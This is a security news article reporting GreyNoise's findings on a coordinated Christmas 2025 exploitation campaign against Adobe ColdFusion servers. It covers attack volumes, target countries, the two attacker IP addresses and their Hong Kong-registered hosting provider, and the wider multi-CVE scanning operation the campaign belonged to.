Security researchers at GreyNoise have reported a coordinated exploitation campaign targeting Adobe ColdFusion servers, with thousands of attack attempts detected during the Christmas 2025 holiday period.
In a report published by GreyNoise, researchers said they observed a concentrated wave of malicious activity aimed at ColdFusion systems between late December and Christmas Day. The firm said the attacks were largely attributable to a single threat actor and were timed to coincide with a period when many organizations operate with reduced security monitoring.
Single Actor Behind Majority Of Attacks
According to GreyNoise, roughly 98% of the observed attack traffic originated from Japan-based infrastructure operated by CTG Server Limited. The actor systematically exploited more than 10 known ColdFusion vulnerabilities disclosed between 2023 and 2024.
The campaign relied on automated behavior and focused on exploiting multiple CVEs in rapid succession. Researchers noted that most of the activity peaked on December 25, reinforcing the assessment that the timing was intentional.
Exploitation Methods And Verification Tools
The attacks primarily used JNDI and LDAP injection techniques as the initial exploitation vector. For out-of-band verification, the actor leveraged ProjectDiscovery Interactsh to confirm successful interactions with targeted servers.
GreyNoise recorded a total of 5,940 malicious requests exploiting ColdFusion vulnerabilities from 2023 and 2024. The requests were part of a coordinated sequence rather than isolated probes.
Geographic Distribution Of Targets
Most of the targeted ColdFusion servers were located in the United States, which accounted for 4,044 of the observed requests. Spain followed with 753 requests, while India accounted for 128. Smaller volumes of activity were seen in other regions.
The researchers said the geographic spread suggests broad scanning rather than a focus on a single country or organization.
Infrastructure And Hosting Provider
GreyNoise identified two IP addresses, 134.122.136.119 and 134.122.136.96, as responsible for nearly all ColdFusion exploitation traffic. Both addresses were hosted by CTG Server Limited under autonomous system AS152194.
The two IPs operated concurrently, shared Interactsh sessions, and rotated through multiple attack techniques in an automated fashion. GreyNoise said this behavior indicates a coordinated setup rather than opportunistic exploitation.
CTG Server Limited is registered in Hong Kong and has shown rapid growth in IP address allocations. GreyNoise noted that the provider has previously been linked to phishing, spam activity, bogon routing, and limited abuse enforcement, raising concerns about its role as a permissive hosting environment.
Part Of A Larger Scanning Operation
GreyNoise said the ColdFusion exploitation represented only a small fraction of a much broader vulnerability scanning effort. The ColdFusion traffic accounted for roughly 0.2% of a campaign that generated more than 2.5 million total requests.
Across the wider operation, the same infrastructure targeted 767 CVEs spanning the years 2001 to 2025. Researchers identified more than 1,200 attack signatures, along with thousands of unique fingerprints and out-of-band interaction domains.
Reconnaissance And Exploitation Scope
The broader campaign focused primarily on reconnaissance activity, followed by attempts at CVE exploitation, local file inclusion, and remote code execution. It targeted more than 47 technology stacks, including Java application servers, web frameworks, content management systems, network devices, and enterprise software platforms.
GreyNoise said the scale of automation, the breadth of vulnerabilities tested, and the structured attack patterns indicate a template-driven reconnaissance effort aimed at mapping exploitable systems across the global internet.
The researchers have published Indicators of Compromise associated with the campaign to support detection and response efforts.
Featured image credits: Flickr
For more stories like it, click the +Follow button at the top of this page to follow us.